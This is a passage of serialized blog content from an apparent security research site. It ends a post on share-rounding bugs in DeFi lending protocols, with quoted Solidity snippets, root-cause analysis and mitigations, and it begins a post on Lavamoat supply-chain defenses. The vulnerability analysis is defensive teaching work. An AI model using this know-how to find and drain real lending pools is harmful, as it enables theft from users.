",{"type":28,"tag":87,"props":45763,"children":45766},{"href":45764,"rel":45765},"https://etherscan.io/address/0x829c3AE2e82760eCEaD0F384918a650F8a31Ba18",[91],[45767],{"type":33,"value":45768},"the code responsible",{"type":33,"value":45770}," for checking if a withdrawal is valid. As a hint, a critical invariant for lending protocols is that there's ",{"type":28,"tag":87,"props":45772,"children":45775},{"href":45773,"rel":45774},"https://www.chainalysis.com/blog/euler-finance-flash-loan-attack/",[91],[45776],{"type":33,"value":45777},"no way to atomically self-bankrupt",{"type":33,"value":141},{"type":28,"tag":234,"props":45780,"children":45782},{"className":4143,"code":45781,"language":4142,"meta":7,"style":7},"uint256 withdrawValue = WISE_ORACLE.getTokensInETH(\n    _poolToken,\n    _amount\n)\n    * WISE_LENDING.lendingPoolData(_poolToken).collateralFactor\n    / PRECISION_FACTOR_E18;\n\nbool state = borrowPercentageCap\n    * (overallETHCollateralsWeighted(_nftId) - withdrawValue)\n    / PRECISION_FACTOR_E18\n    \u003C borrowAmount;\n\nif (state == true) {\n    revert ResultsInBadDebt();\n}\n",[45783],{"type":28,"tag":98,"props":45784,"children":45785},{"__ignoreMap":7},[45786,45817,45825,45833,45840,45862,45875,45882,45903,45933,45945,45957,45964,45988,46005],{"type":28,"tag":116,"props":45787,"children":45788},{"class":245,"line":246},[45789,45794,45799,45803,45808,45813],{"type":28,"tag":116,"props":45790,"children":45791},{"style":339},[45792],{"type":33,"value":45793},"uint256",{"type":28,"tag":116,"props":45795,"children":45796},{"style":266},[45797],{"type":33,"value":45798}," withdrawValue ",{"type":28,"tag":116,"props":45800,"children":45801},{"style":370},[45802],{"type":33,"value":373},{"type":28,"tag":116,"props":45804,"children":45805},{"style":266},[45806],{"type":33,"value":45807}," WISE_ORACLE.",{"type":28,"tag":116,"props":45809,"children":45810},{"style":282},[45811],{"type":33,"value":45812},"getTokensInETH",{"type":28,"tag":116,"props":45814,"children":45815},{"style":266},[45816],{"type":33,"value":3133},{"type":28,"tag":116,"props":45818,"children":45819},{"class":245,"line":256},[45820],{"type":28,"tag":116,"props":45821,"children":45822},{"style":266},[45823],{"type":33,"value":45824},"    _poolToken,\n",{"type":28,"tag":116,"props":45826,"children":45827},{"class":245,"line":293},[45828],{"type":28,"tag":116,"props":45829,"children":45830},{"style":266},[45831],{"type":33,"value":45832},"    _amount\n",{"type":28,"tag":116,"props":45834,"children":45835},{"class":245,"line":361},[45836],{"type":28,"tag":116,"props":45837,"children":45838},{"style":266},[45839],{"type":33,"value":2830},{"type":28,"tag":116,"props":45841,"children":45842},{"class":245,"line":387},[45843,45847,45852,45857],{"type":28,"tag":116,"props":45844,"children":45845},{"style":370},[45846],{"type":33,"value":17223},{"type":28,"tag":116,"props":45848,"children":45849},{"style":266},[45850],{"type":33,"value":45851}," WISE_LENDING.",{"type":28,"tag":116,"props":45853,"children":45854},{"style":282},[45855],{"type":33,"value":45856},"lendingPoolData",{"type":28,"tag":116,"props":45858,"children":45859},{"style":266},[45860],{"type":33,"value":45861},"(_poolToken).collateralFactor\n",{"type":28,"tag":116,"props":45863,"children":45864},{"class":245,"line":400},[45865,45870],{"type":28,"tag":116,"props":45866,"children":45867},{"style":370},[45868],{"type":33,"value":45869},"    /",{"type":28,"tag":116,"props":45871,"children":45872},{"style":266},[45873],{"type":33,"value":45874}," PRECISION_FACTOR_E18;\n",{"type":28,"tag":116,"props":45876,"children":45877},{"class":245,"line":614},[45878],{"type":28,"tag":116,"props":45879,"children":45880},{"emptyLinePlaceholder":19},[45881],{"type":33,"value":1044},{"type":28,"tag":116,"props":45883,"children":45884},{"class":245,"line":631},[45885,45889,45894,45898],{"type":28,"tag":116,"props":45886,"children":45887},{"style":339},[45888],{"type":33,"value":29341},{"type":28,"tag":116,"props":45890,"children":45891},{"style":266},[45892],{"type":33,"value":45893}," state ",{"type":28,"tag":116,"props":45895,"children":45896},{"style":370},[45897],{"type":33,"value":373},{"type":28,"tag":116,"props":45899,"children":45900},{"style":266},[45901],{"type":33,"value":45902}," borrowPercentageCap\n",{"type":28,"tag":116,"props":45904,"children":45905},{"class":245,"line":665},[45906,45910,45914,45919,45924,45928],{"type":28,"tag":116,"props":45907,"children":45908},{"style":370},[45909],{"type":33,"value":17223},{"type":28,"tag":116,"props":45911,"children":45912},{"style":266},[45913],{"type":33,"value":269},{"type":28,"tag":116,"props":45915,"children":45916},{"style":282},[45917],{"type":33,"value":45918},"overallETHCollateralsWeighted",{"type":28,"tag":116,"props":45920,"children":45921},{"style":266},[45922],{"type":33,"value":45923},"(_nftId) ",{"type":28,"tag":116,"props":45925,"children":45926},{"style":370},[45927],{"type":33,"value":3996},{"type":28,"tag":116,"props":45929,"children":45930},{"style":266},[45931],{"type":33,"value":45932}," withdrawValue)\n",{"type":28,"tag":116,"props":45934,"children":45935},{"class":245,"line":713},[45936,45940],{"type":28,"tag":116,"props":45937,"children":45938},{"style":370},[45939],{"type":33,"value":45869},{"type":28,"tag":116,"props":45941,"children":45942},{"style":266},[45943],{"type":33,"value":45944}," PRECISION_FACTOR_E18\n",{"type":28,"tag":116,"props":45946,"children":45947},{"class":245,"line":750},[45948,45952],{"type":28,"tag":116,"props":45949,"children":45950},{"style":370},[45951],{"type":33,"value":546},{"type":28,"tag":116,"props":45953,"children":45954},{"style":266},[45955],{"type":33,"value":45956}," borrowAmount;\n",{"type":28,"tag":116,"props":45958,"children":45959},{"class":245,"line":779},[45960],{"type":28,"tag":116,"props":45961,"children":45962},{"emptyLinePlaceholder":19},[45963],{"type":33,"value":1044},{"type":28,"tag":116,"props":45965,"children":45966},{"class":245,"line":796},[45967,45971,45976,45980,45984],{"type":28,"tag":116,"props":45968,"children":45969},{"style":260},[45970],{"type":33,"value":263},{"type":28,"tag":116,"props":45972,"children":45973},{"style":266},[45974],{"type":33,"value":45975}," (state ",{"type":28,"tag":116,"props":45977,"children":45978},{"style":370},[45979],{"type":33,"value":2340},{"type":28,"tag":116,"props":45981,"children":45982},{"style":376},[45983],{"type":33,"value":1129},{"type":28,"tag":116,"props":45985,"children":45986},{"style":266},[45987],{"type":33,"value":844},{"type":28,"tag":116,"props":45989,"children":45990},{"class":245,"line":847},[45991,45996,46001],{"type":28,"tag":116,"props":45992,"children":45993},{"style":260},[45994],{"type":33,"value":45995},"    revert",{"type":28,"tag":116,"props":45997,"children":45998},{"style":282},[45999],{"type":33,"value":46000}," ResultsInBadDebt",{"type":28,"tag":116,"props":46002,"children":46003},{"style":266},[46004],{"type":33,"value":1445},{"type":28,"tag":116,"props":46006,"children":46007},{"class":245,"line":898},[46008],{"type":28,"tag":116,"props":46009,"children":46010},{"style":266},[46011],{"type":33,"value":406},{"type":28,"tag":29,"props":46013,"children":46014},{},[46015],{"type":33,"value":46016},"The critical observation is that this code operates on token amounts, while the internal accounting necessarily operates on shares.",{"type":28,"tag":29,"props":46018,"children":46019},{},[46020],{"type":33,"value":46021},"Consider: you have one share worth $1000 and (correctly) can borrow $500. If you tried to withdraw $1, the code would round up to withdraw your one share worth $1000, causing you to be immediately liquidatable!",{"type":28,"tag":29,"props":46023,"children":46024},{},[46025,46027,46033],{"type":33,"value":46026},"And indeed, ",{"type":28,"tag":87,"props":46028,"children":46031},{"href":46029,"rel":46030},"https://etherscan.io/address/0x37e49bf3749513A02FA535F0CbC383796E8107E4",[91],[46032],{"type":33,"value":45737},{"type":33,"value":46034}," rounds up the share value.",{"type":28,"tag":234,"props":46036,"children":46038},{"className":4143,"code":46037,"language":4142,"meta":7,"style":7},"function _calculateShares(\n    uint256 _product,\n    uint256 _pseudo,\n    bool _maxSharePrice\n)\n    private\n    pure\n    returns (uint256)\n{\n    return _maxSharePrice == true\n        ? _product % _pseudo == 0\n            ? _product / _pseudo\n            : _product / _pseudo + 1\n        : _product / _pseudo;\n}\n",[46039],{"type":28,"tag":98,"props":46040,"children":46041},{"__ignoreMap":7},[46042,46058,46075,46091,46104,46111,46119,46127,46147,46154,46175,46196,46218,46247,46268],{"type":28,"tag":116,"props":46043,"children":46044},{"class":245,"line":246},[46045,46049,46054],{"type":28,"tag":116,"props":46046,"children":46047},{"style":376},[46048],{"type":33,"value":830},{"type":28,"tag":116,"props":46050,"children":46051},{"style":282},[46052],{"type":33,"value":46053}," _calculateShares",{"type":28,"tag":116,"props":46055,"children":46056},{"style":266},[46057],{"type":33,"value":3133},{"type":28,"tag":116,"props":46059,"children":46060},{"class":245,"line":256},[46061,46066,46071],{"type":28,"tag":116,"props":46062,"children":46063},{"style":339},[46064],{"type":33,"value":46065},"    uint256",{"type":28,"tag":116,"props":46067,"children":46068},{"style":272},[46069],{"type":33,"value":46070}," _product",{"type":28,"tag":116,"props":46072,"children":46073},{"style":266},[46074],{"type":33,"value":3178},{"type":28,"tag":116,"props":46076,"children":46077},{"class":245,"line":293},[46078,46082,46087],{"type":28,"tag":116,"props":46079,"children":46080},{"style":339},[46081],{"type":33,"value":46065},{"type":28,"tag":116,"props":46083,"children":46084},{"style":272},[46085],{"type":33,"value":46086}," _pseudo",{"type":28,"tag":116,"props":46088,"children":46089},{"style":266},[46090],{"type":33,"value":3178},{"type":28,"tag":116,"props":46092,"children":46093},{"class":245,"line":361},[46094,46099],{"type":28,"tag":116,"props":46095,"children":46096},{"style":339},[46097],{"type":33,"value":46098},"    bool",{"type":28,"tag":116,"props":46100,"children":46101},{"style":272},[46102],{"type":33,"value":46103}," _maxSharePrice\n",{"type":28,"tag":116,"props":46105,"children":46106},{"class":245,"line":387},[46107],{"type":28,"tag":116,"props":46108,"children":46109},{"style":266},[46110],{"type":33,"value":2830},{"type":28,"tag":116,"props":46112,"children":46113},{"class":245,"line":400},[46114],{"type":28,"tag":116,"props":46115,"children":46116},{"style":376},[46117],{"type":33,"value":46118},"    private\n",{"type":28,"tag":116,"props":46120,"children":46121},{"class":245,"line":614},[46122],{"type":28,"tag":116,"props":46123,"children":46124},{"style":376},[46125],{"type":33,"value":46126},"    pure\n",{"type":28,"tag":116,"props":46128,"children":46129},{"class":245,"line":631},[46130,46135,46139,46143],{"type":28,"tag":116,"props":46131,"children":46132},{"style":260},[46133],{"type":33,"value":46134},"    returns",{"type":28,"tag":116,"props":46136,"children":46137},{"style":266},[46138],{"type":33,"value":269},{"type":28,"tag":116,"props":46140,"children":46141},{"style":339},[46142],{"type":33,"value":45793},{"type":28,"tag":116,"props":46144,"children":46145},{"style":266},[46146],{"type":33,"value":2830},{"type":28,"tag":116,"props":46148,"children":46149},{"class":245,"line":665},[46150],{"type":28,"tag":116,"props":46151,"children":46152},{"style":266},[46153],{"type":33,"value":10547},{"type":28,"tag":116,"props":46155,"children":46156},{"class":245,"line":713},[46157,46161,46166,46170],{"type":28,"tag":116,"props":46158,"children":46159},{"style":260},[46160],{"type":33,"value":393},{"type":28,"tag":116,"props":46162,"children":46163},{"style":266},[46164],{"type":33,"value":46165}," _maxSharePrice ",{"type":28,"tag":116,"props":46167,"children":46168},{"style":370},[46169],{"type":33,"value":2340},{"type":28,"tag":116,"props":46171,"children":46172},{"style":376},[46173],{"type":33,"value":46174}," true\n",{"type":28,"tag":116,"props":46176,"children":46177},{"class":245,"line":750},[46178,46183,46188,46192],{"type":28,"tag":116,"props":46179,"children":46180},{"style":370},[46181],{"type":33,"value":46182},"        ?",{"type":28,"tag":116,"props":46184,"children":46185},{"style":266},[46186],{"type":33,"value":46187}," _product % _pseudo ",{"type":28,"tag":116,"props":46189,"children":46190},{"style":370},[46191],{"type":33,"value":2340},{"type":28,"tag":116,"props":46193,"children":46194},{"style":350},[46195],{"type":33,"value":23933},{"type":28,"tag":116,"props":46197,"children":46198},{"class":245,"line":779},[46199,46204,46209,46213],{"type":28,"tag":116,"props":46200,"children":46201},{"style":370},[46202],{"type":33,"value":46203},"            ?",{"type":28,"tag":116,"props":46205,"children":46206},{"style":266},[46207],{"type":33,"value":46208}," _product ",{"type":28,"tag":116,"props":46210,"children":46211},{"style":370},[46212],{"type":33,"value":4250},{"type":28,"tag":116,"props":46214,"children":46215},{"style":266},[46216],{"type":33,"value":46217}," _pseudo\n",{"type":28,"tag":116,"props":46219,"children":46220},{"class":245,"line":796},[46221,46226,46230,46234,46239,46243],{"type":28,"tag":116,"props":46222,"children":46223},{"style":370},[46224],{"type":33,"value":46225},"            :",{"type":28,"tag":116,"props":46227,"children":46228},{"style":266},[46229],{"type":33,"value":46208},{"type":28,"tag":116,"props":46231,"children":46232},{"style":370},[46233],{"type":33,"value":4250},{"type":28,"tag":116,"props":46235,"children":46236},{"style":266},[46237],{"type":33,"value":46238}," _pseudo ",{"type":28,"tag":116,"props":46240,"children":46241},{"style":370},[46242],{"type":33,"value":2268},{"type":28,"tag":116,"props":46244,"children":46245},{"style":350},[46246],{"type":33,"value":19106},{"type":28,"tag":116,"props":46248,"children":46249},{"class":245,"line":847},[46250,46255,46259,46263],{"type":28,"tag":116,"props":46251,"children":46252},{"style":370},[46253],{"type":33,"value":46254},"        :",{"type":28,"tag":116,"props":46256,"children":46257},{"style":266},[46258],{"type":33,"value":46208},{"type":28,"tag":116,"props":46260,"children":46261},{"style":370},[46262],{"type":33,"value":4250},{"type":28,"tag":116,"props":46264,"children":46265},{"style":266},[46266],{"type":33,"value":46267}," _pseudo;\n",{"type":28,"tag":116,"props":46269,"children":46270},{"class":245,"line":898},[46271],{"type":28,"tag":116,"props":46272,"children":46273},{"style":266},[46274],{"type":33,"value":406},{"type":28,"tag":29,"props":46276,"children":46277},{},[46278,46283],{"type":28,"tag":2583,"props":46279,"children":46280},{},[46281],{"type":33,"value":46282},"Regardless of which way the share rounding occurs, this is a bug",{"type":33,"value":46284},". The correct way would be to do calculations in units of shares and force users to withdraw in increments of shares (and then round down the tokens ultimately received in the end).",{"type":28,"tag":29,"props":46286,"children":46287},{},[46288],{"type":33,"value":46289},"This is a really tricky invariant to reason about!",{"type":28,"tag":63,"props":46291,"children":46293},{"id":46292},"root-cause",[46294],{"type":33,"value":46295},"Root Cause",{"type":28,"tag":29,"props":46297,"children":46298},{},[46299],{"type":33,"value":46300},"Even though this sort of exploit seems pervasive, it requires quite a lot of factors to be exploitable.",{"type":28,"tag":29,"props":46302,"children":46303},{},[46304],{"type":33,"value":46305},"Most importantly, the share value needs to be inflatable. Usually, this requires an integer representation for both shares and tokens. The conversion rate also needs to be expressed in terms of the shares and tokens as opposed to being stored separately.",{"type":28,"tag":234,"props":46307,"children":46309},{"className":4143,"code":46308,"language":4142,"meta":7,"style":7},"totalDepositShares * _amount / pseudoTotalPool\n",[46310],{"type":28,"tag":98,"props":46311,"children":46312},{"__ignoreMap":7},[46313],{"type":28,"tag":116,"props":46314,"children":46315},{"class":245,"line":246},[46316,46321,46325,46330,46334],{"type":28,"tag":116,"props":46317,"children":46318},{"style":266},[46319],{"type":33,"value":46320},"totalDepositShares ",{"type":28,"tag":116,"props":46322,"children":46323},{"style":370},[46324],{"type":33,"value":4240},{"type":28,"tag":116,"props":46326,"children":46327},{"style":266},[46328],{"type":33,"value":46329}," _amount ",{"type":28,"tag":116,"props":46331,"children":46332},{"style":370},[46333],{"type":33,"value":4250},{"type":28,"tag":116,"props":46335,"children":46336},{"style":266},[46337],{"type":33,"value":46338}," pseudoTotalPool\n",{"type":28,"tag":29,"props":46340,"children":46341},{},[46342],{"type":33,"value":46343},"The second critical requirement is a generally empty pool. Inflating the share value means that all other shares also rise in value. If there are shares that are not controlled by the attacker, this would mean giving other users free money, almost definitely stopping inflation attacks.",{"type":28,"tag":29,"props":46345,"children":46346},{},[46347,46349,46353],{"type":33,"value":46348},"Finally, there must be improper rounding or accounting. This last requirement is generally easiest to satisfy. Share rounding is a new attack vector, and people haven't thought carefully about proper treatment of dust. Have you analyzed ",{"type":28,"tag":2583,"props":46350,"children":46351},{},[46352],{"type":33,"value":19581},{"type":33,"value":46354}," integer division?",{"type":28,"tag":63,"props":46356,"children":46358},{"id":46357},"mitigations",[46359],{"type":33,"value":46360},"Mitigations",{"type":28,"tag":29,"props":46362,"children":46363},{},[46364],{"type":33,"value":46365},"The easiest way to prevent this attack is to prevent share values from being manipulated. An unexpectedly high share value can lead to denial of service scenarios and is probably worth mitigating by itself.",{"type":28,"tag":29,"props":46367,"children":46368},{},[46369,46371,46378],{"type":33,"value":46370},"The best way is to ensure that the pool has some amount of deposits on deployment, whether operationally or programmatically. As ",{"type":28,"tag":87,"props":46372,"children":46375},{"href":46373,"rel":46374},"https://twitter.com/danielvf/status/1746306320553152615",[91],[46376],{"type":33,"value":46377},"@danielvf notes",{"type":33,"value":46379},", protocols like Uniswap burn a portion of the initial deposit for this very reason.",{"type":28,"tag":234,"props":46381,"children":46383},{"className":4143,"code":46382,"language":4142,"meta":7,"style":7},"if (_totalSupply == 0) {\n    liquidity = Math.sqrt(amount0.mul(amount1)).sub(MINIMUM_LIQUIDITY);\n   _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens\n} else {\n",[46384],{"type":28,"tag":98,"props":46385,"children":46386},{"__ignoreMap":7},[46387,46411,46458,46492],{"type":28,"tag":116,"props":46388,"children":46389},{"class":245,"line":246},[46390,46394,46399,46403,46407],{"type":28,"tag":116,"props":46391,"children":46392},{"style":260},[46393],{"type":33,"value":263},{"type":28,"tag":116,"props":46395,"children":46396},{"style":266},[46397],{"type":33,"value":46398}," (_totalSupply ",{"type":28,"tag":116,"props":46400,"children":46401},{"style":370},[46402],{"type":33,"value":2340},{"type":28,"tag":116,"props":46404,"children":46405},{"style":350},[46406],{"type":33,"value":2718},{"type":28,"tag":116,"props":46408,"children":46409},{"style":266},[46410],{"type":33,"value":844},{"type":28,"tag":116,"props":46412,"children":46413},{"class":245,"line":256},[46414,46419,46423,46428,46433,46438,46443,46448,46453],{"type":28,"tag":116,"props":46415,"children":46416},{"style":266},[46417],{"type":33,"value":46418},"    liquidity ",{"type":28,"tag":116,"props":46420,"children":46421},{"style":370},[46422],{"type":33,"value":373},{"type":28,"tag":116,"props":46424,"children":46425},{"style":266},[46426],{"type":33,"value":46427}," Math.",{"type":28,"tag":116,"props":46429,"children":46430},{"style":282},[46431],{"type":33,"value":46432},"sqrt",{"type":28,"tag":116,"props":46434,"children":46435},{"style":266},[46436],{"type":33,"value":46437},"(amount0.",{"type":28,"tag":116,"props":46439,"children":46440},{"style":282},[46441],{"type":33,"value":46442},"mul",{"type":28,"tag":116,"props":46444,"children":46445},{"style":266},[46446],{"type":33,"value":46447},"(amount1)).",{"type":28,"tag":116,"props":46449,"children":46450},{"style":282},[46451],{"type":33,"value":46452},"sub",{"type":28,"tag":116,"props":46454,"children":46455},{"style":266},[46456],{"type":33,"value":46457},"(MINIMUM_LIQUIDITY);\n",{"type":28,"tag":116,"props":46459,"children":46460},{"class":245,"line":293},[46461,46466,46470,46474,46478,46482,46487],{"type":28,"tag":116,"props":46462,"children":46463},{"style":282},[46464],{"type":33,"value":46465},"   _mint",{"type":28,"tag":116,"props":46467,"children":46468},{"style":266},[46469],{"type":33,"value":313},{"type":28,"tag":116,"props":46471,"children":46472},{"style":339},[46473],{"type":33,"value":32281},{"type":28,"tag":116,"props":46475,"children":46476},{"style":266},[46477],{"type":33,"value":313},{"type":28,"tag":116,"props":46479,"children":46480},{"style":350},[46481],{"type":33,"value":353},{"type":28,"tag":116,"props":46483,"children":46484},{"style":266},[46485],{"type":33,"value":46486},"), MINIMUM_LIQUIDITY); ",{"type":28,"tag":116,"props":46488,"children":46489},{"style":250},[46490],{"type":33,"value":46491},"// permanently lock the first MINIMUM_LIQUIDITY tokens\n",{"type":28,"tag":116,"props":46493,"children":46494},{"class":245,"line":361},[46495,46500,46504],{"type":28,"tag":116,"props":46496,"children":46497},{"style":266},[46498],{"type":33,"value":46499},"} ",{"type":28,"tag":116,"props":46501,"children":46502},{"style":260},[46503],{"type":33,"value":2986},{"type":28,"tag":116,"props":46505,"children":46506},{"style":266},[46507],{"type":33,"value":1291},{"type":28,"tag":29,"props":46509,"children":46510},{},[46511,46513,46520],{"type":33,"value":46512},"Alternatively, ",{"type":28,"tag":87,"props":46514,"children":46517},{"href":46515,"rel":46516},"https://github.com/SynonymFinance/smart-contracts-public/blob/759c6afe45720e26d731f081dfc747787ad7ae20/evm/src/contracts/lendingHub/HubInterestUtilities.sol#L52-L53",[91],[46518],{"type":33,"value":46519},"storing the conversion rate separately",{"type":33,"value":46521}," can also suffice. A key factor is that depositing additional tokens or burning shares affects the conversion rate. If the conversion rate is hardcoded and updated only during interest accrual, there's nothing to manipulate.",{"type":28,"tag":234,"props":46523,"children":46525},{"className":4143,"code":46524,"language":4142,"meta":7,"style":7},"accrualIndices.borrowed = accrualIndices.borrowed * borrowInterestFactor / precision;\naccrualIndices.deposited = accrualIndices.deposited * depositInterestFactor / precision;\n",[46526],{"type":28,"tag":98,"props":46527,"children":46528},{"__ignoreMap":7},[46529,46564],{"type":28,"tag":116,"props":46530,"children":46531},{"class":245,"line":246},[46532,46537,46541,46546,46550,46555,46559],{"type":28,"tag":116,"props":46533,"children":46534},{"style":266},[46535],{"type":33,"value":46536},"accrualIndices.borrowed ",{"type":28,"tag":116,"props":46538,"children":46539},{"style":370},[46540],{"type":33,"value":373},{"type":28,"tag":116,"props":46542,"children":46543},{"style":266},[46544],{"type":33,"value":46545}," accrualIndices.borrowed ",{"type":28,"tag":116,"props":46547,"children":46548},{"style":370},[46549],{"type":33,"value":4240},{"type":28,"tag":116,"props":46551,"children":46552},{"style":266},[46553],{"type":33,"value":46554}," borrowInterestFactor ",{"type":28,"tag":116,"props":46556,"children":46557},{"style":370},[46558],{"type":33,"value":4250},{"type":28,"tag":116,"props":46560,"children":46561},{"style":266},[46562],{"type":33,"value":46563}," precision;\n",{"type":28,"tag":116,"props":46565,"children":46566},{"class":245,"line":256},[46567,46572,46576,46581,46585,46590,46594],{"type":28,"tag":116,"props":46568,"children":46569},{"style":266},[46570],{"type":33,"value":46571},"accrualIndices.deposited ",{"type":28,"tag":116,"props":46573,"children":46574},{"style":370},[46575],{"type":33,"value":373},{"type":28,"tag":116,"props":46577,"children":46578},{"style":266},[46579],{"type":33,"value":46580}," accrualIndices.deposited ",{"type":28,"tag":116,"props":46582,"children":46583},{"style":370},[46584],{"type":33,"value":4240},{"type":28,"tag":116,"props":46586,"children":46587},{"style":266},[46588],{"type":33,"value":46589}," depositInterestFactor ",{"type":28,"tag":116,"props":46591,"children":46592},{"style":370},[46593],{"type":33,"value":4250},{"type":28,"tag":116,"props":46595,"children":46596},{"style":266},[46597],{"type":33,"value":46563},{"type":28,"tag":29,"props":46599,"children":46600},{},[46601],{"type":33,"value":46602},"We also want to note some general takeaways:",{"type":28,"tag":29,"props":46604,"children":46605},{},[46606,46608,46613],{"type":33,"value":46607},"Invariant testing is overhyped, but is quite applicable here. Instead of attempting to reason about effects after a state change, ",{"type":28,"tag":2583,"props":46609,"children":46610},{},[46611],{"type":33,"value":46612},"apply the state changes and check the invariant",{"type":33,"value":141},{"type":28,"tag":29,"props":46615,"children":46616},{},[46617],{"type":33,"value":46618},"From a protocol design perspective, users are withdrawing shares, not tokens. This is an important distinction. Your accounting logic should reason in terms of shares when possible.",{"type":28,"tag":29,"props":46620,"children":46621},{},[46622],{"type":33,"value":46623},"And finally, correct rounding behavior should still be accounted for, even if it doesn't seem impactful.",{"type":28,"tag":63,"props":46625,"children":46626},{"id":2506},[46627],{"type":33,"value":2509},{"type":28,"tag":29,"props":46629,"children":46630},{},[46631],{"type":33,"value":46632},"Rounding forces protocol developers to think carefully about dust. It's not always enough to round against the user. While initially this seems like a novel, scary attack vector, much of the impact can be mitigated operationally.",{"type":28,"tag":29,"props":46634,"children":46635},{},[46636],{"type":33,"value":46637},"As a final exercise to the reader: what is the correct rounding behavior during liquidations?",{"type":28,"tag":2516,"props":46639,"children":46640},{},[46641],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":46643},[46644,46645,46646,46650,46651,46652],{"id":28670,"depth":256,"text":28673},{"id":45566,"depth":256,"text":45569},{"id":45685,"depth":256,"text":45688,"children":46647},[46648,46649],{"id":45696,"depth":293,"text":45699},{"id":45734,"depth":293,"text":45737},{"id":46292,"depth":256,"text":46295},{"id":46357,"depth":256,"text":46360},{"id":2506,"depth":256,"text":2509},"content:blog:2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs",{"_path":46657,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":46658,"description":46659,"author":46660,"image":46661,"date":46663,"isFeatured":19,"onBlogPage":19,"body":46664,"_type":2534,"_id":50137,"_source":2536,"_file":50138,"_stem":50139,"_extension":2539},"/blog/2024-06-10-supply-chain-attacks-a-new-era","Supply Chain Attacks: A New Era","Unpacking Lavamoat and how it fights supply chain attacks in Web3. We spill the beans on some sneaky bypasses, illustrating just how tricky it is to lock down JavaScript ecosystems.",[12,13],{"src":46662},"/posts/supply-chain-attacks-a-new-era/header.jpg","2024-06-10",{"type":25,"children":46665,"toc":50116},[46666,46670,46691,46696,46700,46705,46744,46750,46765,46783,46788,46793,46798,46811,47118,47144,47157,47162,47167,47181,47186,47199,47212,47443,47464,47499,47505,47510,47515,47728,47749,47755,47767,47857,47879,47915,47923,47941,48195,48221,48227,48241,48439,48458,48865,48878,48884,48903,48996,49001,49007,49020,49033,49119,49125,49137,49222,49234,49247,49253,49258,49272,49599,49604,49609,49615,49641,49694,49714,49767,49773,49778,49797,49808,50002,50008,50031,50037,50042,50055,50060,50065,50069,50074,50082,50112],{"type":28,"tag":63,"props":46667,"children":46668},{"id":18619},[46669],{"type":33,"value":18622},{"type":28,"tag":29,"props":46671,"children":46672},{},[46673,46680,46682,46689],{"type":28,"tag":87,"props":46674,"children":46677},{"href":46675,"rel":46676},"https://www.cloudflare.com/it-it/learning/security/what-is-a-supply-chain-attack/",[91],[46678],{"type":33,"value":46679},"Supply chain",{"type":33,"value":46681}," attacks are becoming ",{"type":28,"tag":87,"props":46683,"children":46686},{"href":46684,"rel":46685},"https://www.bleepingcomputer.com/news/security/ledger-dapp-supply-chain-attack-steals-600k-from-crypto-wallets/",[91],[46687],{"type":33,"value":46688},"increasingly popular in Web3",{"type":33,"value":46690},". In response, Lavamoat has emerged as a robust defense mechanism against supply chain attacks, offering sophisticated isolation and access control features. These help ensure that malicious dependencies cannot execute harmful code.",{"type":28,"tag":29,"props":46692,"children":46693},{},[46694],{"type":33,"value":46695},"In this article, we will explore how each component of Lavamoat works, and dive into the various bypasses we reported.",{"type":28,"tag":75,"props":46697,"children":46698},{"id":28670},[46699],{"type":33,"value":28673},{"type":28,"tag":29,"props":46701,"children":46702},{},[46703],{"type":33,"value":46704},"It is important to note that there are three different versions of LavaMoat:",{"type":28,"tag":455,"props":46706,"children":46707},{},[46708,46720,46732],{"type":28,"tag":459,"props":46709,"children":46710},{},[46711,46718],{"type":28,"tag":87,"props":46712,"children":46715},{"href":46713,"rel":46714},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/browserify",[91],[46716],{"type":33,"value":46717},"Lavamoat Browserify",{"type":33,"value":46719}," serves as a bundle packer. This helps organize and package JavaScript code for frontend deployment.",{"type":28,"tag":459,"props":46721,"children":46722},{},[46723,46730],{"type":28,"tag":87,"props":46724,"children":46727},{"href":46725,"rel":46726},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/node",[91],[46728],{"type":33,"value":46729},"NodeJS Lavamoat",{"type":33,"value":46731}," is a variant of Lavamoat tailored specifically for Node.js environments.",{"type":28,"tag":459,"props":46733,"children":46734},{},[46735,46742],{"type":28,"tag":87,"props":46736,"children":46739},{"href":46737,"rel":46738},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/allow-scripts",[91],[46740],{"type":33,"value":46741},"Lavamoat allow-scripts",{"type":33,"value":46743}," are used to prevent malicious code execution on lifecycle scripts.",{"type":28,"tag":75,"props":46745,"children":46747},{"id":46746},"lavamoats-security-features",[46748],{"type":33,"value":46749},"Lavamoat's Security Features",{"type":28,"tag":29,"props":46751,"children":46752},{},[46753,46755,46763],{"type":33,"value":46754},"The three most important features of Lavamoat",{"type":28,"tag":15136,"props":46756,"children":46757},{},[46758],{"type":28,"tag":87,"props":46759,"children":46761},{"href":29279,"ariaDescribedBy":46760,"dataFootnoteRef":7,"id":29281},[15143],[46762],{"type":33,"value":1824},{"type":33,"value":46764}," are:",{"type":28,"tag":2108,"props":46766,"children":46767},{},[46768,46773,46778],{"type":28,"tag":459,"props":46769,"children":46770},{},[46771],{"type":33,"value":46772},"Policy Files",{"type":28,"tag":459,"props":46774,"children":46775},{},[46776],{"type":33,"value":46777},"NPM Anti Hijacking",{"type":28,"tag":459,"props":46779,"children":46780},{},[46781],{"type":33,"value":46782},"Scuttling",{"type":28,"tag":29,"props":46784,"children":46785},{},[46786],{"type":33,"value":46787},"Let's go over them one by one.",{"type":28,"tag":443,"props":46789,"children":46791},{"id":46790},"policy-files",[46792],{"type":33,"value":46772},{"type":28,"tag":29,"props":46794,"children":46795},{},[46796],{"type":33,"value":46797},"Policy files are one important feature of Lavamoat, as they limit access to the potentially dangeorus platform API and Globals.",{"type":28,"tag":29,"props":46799,"children":46800},{},[46801,46803,46810],{"type":33,"value":46802},"For example, take the ",{"type":28,"tag":87,"props":46804,"children":46807},{"href":46805,"rel":46806},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L77",[91],[46808],{"type":33,"value":46809},"Metamask Snap policy 